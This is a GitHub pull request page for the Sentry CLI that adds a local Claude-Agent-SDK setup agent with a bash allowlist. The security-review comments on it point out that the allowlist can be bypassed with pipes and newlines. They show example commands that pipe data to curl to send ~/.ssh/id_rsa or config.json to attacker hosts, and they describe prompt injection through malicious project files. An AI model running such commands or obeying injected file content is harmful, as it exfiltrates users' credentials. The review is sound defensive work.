Skip to content

feat(init): run the setup agent locally via the Claude Agent SDK#1143

Draft
betegon wants to merge 3 commits into
mainfrom
feat/init-local-agent
Draft

feat(init): run the setup agent locally via the Claude Agent SDK#1143
betegon wants to merge 3 commits into
mainfrom
feat/init-local-agent

Conversation

@betegon

@betegon betegon commented Jun 26, 2026

Copy link
Copy Markdown
Member

Summary

Replaces the remote Mastra workflow (suspend/resume over the network) with a
local coding agent powered by @anthropic-ai/claude-agent-sdk. The agent
inspects the project, fetches Sentry docs on demand, installs the SDK, and
applies changes locally. We keep all the pre-agent work (preflight, org/project
resolution, project creation, feature selection, UI) and drop the suspend/resume
protocol and @mastra/client-js.

Inspired by PostHog's wizard, which runs the same SDK locally.

Changes

  • New local agent runner (src/lib/init/agent/): drives query(), gates tools via canUseTool (.env block + bash allowlist), isolates from the user's Claude settings (settingSources: []).
  • Model traffic routes through the Sentry init gateway -> Vercel AI Gateway (ANTHROPIC_BASE_URL). SENTRY_INIT_ANTHROPIC_API_KEY is a BYO-key/self-host/dev escape hatch straight to Anthropic.
  • Docs are local and iterative: get_docs_by_keywords walks docs.sentry.io/doctree.json and fetches .md pages — the agent calls it as often as it needs (src/lib/init/docs/). No remote docs service.
  • Deterministic Xcode/pbxproj transforms (sentry-cocoa SPM, React Native build phases) ship as in-process tools the agent invokes when it detects the platform (src/lib/init/agent/framework/).
  • wizard-runner rewritten to the local flow; removed init-service-auth and the old suspend/resume test.

Distribution / size

The SDK's JS is bundled at build time, but its per-platform native runtime is
not — the CLI stays fully bundled with zero runtime deps (check:no-deps). On
first init the native runtime is downloaded and cached under
~/.sentry/agent/<version>/<platform>/ (integrity-checked) and reused; running
from source uses the SDK's own binary and skips the download. So the shipped
artifacts barely grow; the heavy part is a one-time, per-machine, cached fetch.

Measured on darwin-arm64 (other platforms similar):

Artifact Before (main) After Δ
Single binary (SEA) 101 MB 102 MB +~1 MB
npm package, packed 2.5 MB 2.6 MB +~0.1 MB
npm package, unpacked 9.3 MB 9.6 MB +~0.3 MB
Bundle dist/index.cjs 4031 KB 4382 KB +~351 KB
Agent runtime (native claude) ~62 MB download / ~210 MB on disk not shipped; fetched once on first init, cached in ~/.sentry

(For comparison, embedding the native runtime into the binary instead would take it to ~312 MB per platform, ~3x — which is why we download-and-cache.)

Test plan

  • pnpm typecheck, pnpm lint, pnpm check:deps, vitest run test/lib/init (376 + new agent/docs tests green).
  • Ran sentry init on 19 framework test projects (JS, Python, Cloudflare, native iOS, monorepos, large apps): 19/19 applied a working integration.
  • Runtime-verified data lands in Sentry: node-express (errors + traces) and flask (errors).
  • Verified from the compiled binary run outside any node_modules: first run downloads + caches the runtime (~/.sentry/agent/.../claude), subsequent runs reuse it.
  • Parity vs production (0.37.0 Mastra) on all 19: equivalent-or-better where prod succeeded; new also succeeded on 5 projects prod failed (monorepos it refused, a timeout, a prod bug); new is ~2-3x faster. New also declares the SDK in Python manifests where prod left it out.

Known gaps (follow-ups)

  • Monorepo app-selection isn't gated: the agent auto-picks an app instead of requiring --app like prod. Usually it picks well, but for strapi it chose the framework's own package. Needs the deferred app-listing + --app gating.
  • Package-manager detection is non-deterministic (one nextjs run used npm in a bun project). Worth pinning.

Depends on getsentry/cli-init-api#182 (the gateway) being deployed. Merge/deploy the gateway first.

betegon and others added 2 commits June 26, 2026 10:03
Replace the remote Mastra workflow (suspend/resume over the network) with a
local coding agent powered by @anthropic-ai/claude-agent-sdk. The agent
inspects the project, fetches Sentry docs on demand, and applies changes
locally, so we no longer maintain a server-side workflow or the suspend/resume
protocol.

- model traffic routes through the Sentry init gateway to the Vercel AI
  Gateway (ANTHROPIC_BASE_URL); a SENTRY_INIT_ANTHROPIC_API_KEY escape hatch
  allows BYO-key / self-host / dev runs straight to Anthropic
- docs are served by a local, iterative get_docs_by_keywords tool that walks
  docs.sentry.io's doctree.json and fetches .md pages (no remote docs service)
- deterministic Xcode/pbxproj transforms (sentry-cocoa SPM, React Native build
  phases) ship as in-process tools the agent calls when it detects the platform
- drop @mastra/client-js and init-service-auth; readiness now checks the gateway

Co-authored-by: Cursor <cursoragent@cursor.com>
Unit tests for the local-agent tool gate (.env block, bash allowlist,
recursive-wizard guard) and the doctree lookup helpers (lib/feature path
mapping, seed-page discovery, path normalization).

Co-authored-by: Cursor <cursoragent@cursor.com>
@github-actions

github-actions Bot commented Jun 26, 2026

Copy link
Copy Markdown
Contributor
PR Preview Action v1.8.1

QR code for preview link

🚀 View preview at
https://cli.sentry.dev/_preview/pr-1143/

Built to branch gh-pages at 2026-06-26 09:08 UTC.
Preview will be ready when the GitHub Pages deployment is complete.

*/
export function normalizeDocPath(path: string): string {
let p = path.trim();
if (p.startsWith(BASE_URL)) {

@sentry-warden sentry-warden Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Bash allowlist filter missing pipe and newline operators, enabling shell injection bypass

In src/lib/init/agent/permissions.ts, SHELL_OPERATOR_RE (/[;&\$()]/) omits |, >, <, and \n, so a prompt-injected command like npm run build | curl https://attacker.com -d @~/.ssh/id_rsa passes every guard (DANGEROUS_BASH_RE, SHELL_OPERATOR_RE, and the startsWith("npm run")prefix check) and executes as-is. Add|, >, <, and \n/\r` to the operator regex.

Evidence
  • SHELL_OPERATOR_RE = /[;&\$()]/inpermissions.tsline 21 does not include|, >, <`, or newline characters.
  • isAllowedBash('npm run build | curl https://evil.com -d @~/.ssh/id_rsa'): DANGEROUS_BASH_RE → false; SHELL_OPERATOR_RE.test(...) → false (no chars in [;&amp;\$()]); startsWith('npm run')` → true → allowed.
  • Newline injection also bypasses: 'npm install x\ncurl https://evil.com' starts with 'npm install' and contains no blocked characters.
  • The Bash tool is enabled in non-dryRun mode (runner.ts buildAllowedTools), and the agent reads user-controlled project files, making prompt injection a viable attack path.
  • A malicious repository file (e.g., a README or config) could inject an instruction causing the agent to issue a piped exfiltration command that the filter accepts.

Identified by Warden security-review

const DANGEROUS_BASH_RE =
/(?:^|\s)(?:rm\s+-rf|git\s+reset|git\s+checkout|sudo|chmod\s+-R|chown\s+-R)(?:\s|$)/i;
const SAFE_REDIRECT_RE = /\s+2>\/dev\/null\s*$/u;
const SHELL_OPERATOR_RE = /[;&`$()]/;

@sentry-warden sentry-warden Bot Jun 26, 2026

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Bash allowlist bypass: pipe operator not blocked allows arbitrary command chaining

The SHELL_OPERATOR_RE regex (/[;&\$()]/) used by isAllowedBashomits the pipe character|, so a command such as npm install | bashornpm run build | curl --data-binary @config.json https://attacker.com` starts with an allowed prefix, contains no blocked operator, and is approved by canUseInitAgentTool. Because the shell executes the command on the right of the pipe, an attacker who injects instructions via a crafted project file (the agent reads project files under permissionMode: acceptEdits) can run arbitrary programs and exfiltrate data despite the allowlist.

Evidence
  • permissions.ts:20 defines SHELL_OPERATOR_RE = /[;&\$()]/, which does not include |(also missing>` and newline).
  • isAllowedBash (line 87) blocks only on DANGEROUS_BASH_RE or SHELL_OPERATOR_RE, then requires a SAFE_BASH_PREFIXES prefix; npm install | bash matches the npm install prefix and has no blocked operator, so it returns true.
  • canUseInitAgentTool (line 132) returns allow for that command; the right side of the pipe is executed as an arbitrary program, defeating the allowlist's intent.
  • runner.ts:213 runs the agent with permissionMode: "acceptEdits" and Read/Grep allowed on non-.env paths, giving a prompt-injection path through attacker-supplied project files to trigger such Bash commands.
Also found at 4 additional locations
  • src/lib/init/agent/runner.ts:220-221
  • src/lib/init/constants.ts:20
  • src/lib/init/wizard-runner.ts:20-20
  • src/lib/init/wizard-runner.ts:408

Identified by Warden security-review, find-bugs · A66-C5D

Comment on lines +55 to +68
}
for (const [key, phase] of Object.entries(
objects.PBXFrameworksBuildPhase
)) {
if (key.endsWith("_comment") || typeof phase === "string") {
continue;
}
const p = phase as PBXFrameworksBuildPhase;
if (!p.files) {
p.files = [];
}
p.files.push({ value: fwUUID, comment: "Sentry in Frameworks" });
}

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Frameworks build phase patched for all targets but packageProductDependencies only added to application targets

fwUUID is pushed into every PBXFrameworksBuildPhase regardless of target type, but depUUID is added to packageProductDependencies only for com.apple.product-type.application targets. Any other target (e.g. a unit-test target) will end up with a PBXBuildFile whose productRef points to an XCSwiftPackageProductDependency that is not declared on that target, producing an Xcode validation error on the modified project.

Evidence
  • Lines 55–68 iterate objects.PBXFrameworksBuildPhase with no filter on target type and push fwUUID to every phase's files array.
  • Lines 71–84 iterate objects.PBXNativeTarget but skip any target whose productType is not '"com.apple.product-type.application"' before pushing depUUID into packageProductDependencies.
  • fwUUID is defined as { isa: 'PBXBuildFile', productRef: depUUID } (line 46–49); Xcode requires that a PBXBuildFile.productRef pointing to an XCSwiftPackageProductDependency be declared in the referencing target's packageProductDependencies.
  • A standard iOS project with an XCTestBundle target has its own PBXFrameworksBuildPhase, so the mismatch affects virtually every real project.

Identified by Warden find-bugs · K8Y-YEB

Comment thread src/lib/init/agent/tools.ts
The CLI ships fully bundled with zero runtime dependencies (npm package and
single binary alike), so the Claude Agent SDK's per-platform native runtime
(~62 MB download, ~210 MB on disk) can't ride along in node_modules. Download
it on first `init` and cache it under ~/.sentry/agent/<version>/<platform>, then
point the SDK at it via pathToClaudeCodeExecutable. Subsequent runs reuse the
cache; running from source (node_modules present) uses the SDK's own binary and
skips the download.

Keeps @anthropic-ai/claude-agent-sdk and xcode as bundled devDependencies so
the published package stays dependency-free (check:no-deps).

Co-authored-by: Cursor <cursoragent@cursor.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants